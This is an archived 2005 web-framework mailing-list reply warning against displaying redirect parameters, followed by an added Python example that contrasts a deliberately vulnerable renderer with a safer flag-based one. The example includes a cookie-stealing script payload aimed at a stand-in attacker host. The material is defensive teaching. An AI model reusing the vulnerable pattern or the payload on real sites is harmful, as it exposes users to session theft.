On Wed, Feb 16, 2005 at 09:00:51AM -0500, William McKee wrote:
> This means that you could pass that message as a parameter when you do
> the redirect.
That's a bad idea, IMNSHO. Never pass anything as a parameter that will
get displayed. That would open you up to attacks.
I could send people a link to your site that would email me all sorts of
info (including cookies, which would let me attack their session). And
anything I did would appear to be coming from your site.
What we do here is use flags. In my case, a hashref exported to my
template, so my template can say (I'm using Template Toolkit, but this
works with any real templating system such as HTML::Template as well):
[% IF Notes.Username %]
Please enter your username/password:
[% END %]
In addition to protecting the site from one form of attack, it leaves
the control of the message itself to the designer where it belongs.
To try to answer your more general question: You can use the redirect
suggestion with the flags (as nothing passed is displayed), or you can
store the flags in the session on a per application basis. Each app can
"erase" any flags for it after each read, assuming none of your flags
last more than one action.
--
SwiftOne / Brett Sanger
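The two patterns Brett contrasts above, as an added example that is not part of the original post and not the cgiapp or Template Toolkit code: a redirect that carries free text in `?msg=` and echoes it (the reflected-XSS case), beside a redirect that carries only a flag name (`?note=username`) which is checked against a fixed table before the template decides what to say, plus the session-stored variant where an application's flags are erased on read. It is written in Python rather than Perl so it runs stand-alone; the names `NOTES`, `render_vulnerable`, `parse_flags`, `render_with_flags`, `set_flag`, `take_flags` and the `flags:<app>` session key are all hypothetical, and the payload and query strings are constructed for the demonstration.

```python
import html
import urllib.parse

# Hypothetical table of flags a redirect may carry.  The wording lives here
# (or in the template), never in the URL: the query string only selects
# which block to show.  Constructed for this example.
NOTES = {
    "username": "Please enter your username/password:",
    "expired": "Your session has expired; please log in again.",
}


def render_vulnerable(query: str) -> str:
    """The pattern warned against: whatever ?msg= carries is written into the page.

    A link such as ?msg=<script>...</script> sent to a victim runs in the
    victim's browser under the site's origin, so it can read cookies.
    """
    params = urllib.parse.parse_qs(query)
    msg = params.get("msg", [""])[0]
    return f"<p>{msg}</p>"


def parse_flags(query: str) -> dict:
    """Build the equivalent of the Notes hashref from the query string.

    Only names present in NOTES become true; an attacker-supplied name is
    dropped, so nothing from the URL ever reaches the rendered HTML.
    """
    params = urllib.parse.parse_qs(query)
    requested = params.get("note", [])
    return {name: True for name in requested if name in NOTES}


def render_with_flags(notes: dict) -> str:
    """Equivalent of [% IF Notes.Username %] ... [% END %] for each flag.

    The text is designer-controlled; escaping is kept anyway as defence in
    depth in case a NOTES string ever contains markup characters.
    """
    return "".join(f"<p>{html.escape(NOTES[name])}</p>" for name in NOTES if notes.get(name))


def set_flag(session: dict, app: str, name: str) -> None:
    """Store a flag in the session under a per-application key."""
    session.setdefault(f"flags:{app}", {})[name] = True


def take_flags(session: dict, app: str) -> dict:
    """Return and erase one application's flags, so none outlives a single read."""
    return session.pop(f"flags:{app}", {})


if __name__ == "__main__":
    # Constructed attacker link: exfiltrates document.cookie to an attacker host.
    payload = "<script>new Image().src='http://attacker.invalid/?c='+document.cookie</script>"
    print(render_vulnerable("msg=" + urllib.parse.quote(payload)))   # script lands in the page
    print(render_with_flags(parse_flags("note=username")))           # designer's text only
    print(repr(render_with_flags(parse_flags("note=" + payload))))   # unknown flag: nothing shown

    session = {}
    set_flag(session, "login", "expired")
    print(render_with_flags(take_flags(session, "login")))           # shown once
    print(repr(render_with_flags(take_flags(session, "login"))))     # erased after first read
```

The safe path never interpolates request data: `parse_flags` only produces keys that already exist in `NOTES`, so a hostile `note=` value is silently dropped, and `take_flags` uses `dict.pop` so a flag set for one action cannot reappear on the next page load.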
---------------------------------------------------------------------
Web Archive: http://www.mail-archive.com/suppressed/
http://marc.theaimsgroup.com/?l=cgiapp&r=1&w=2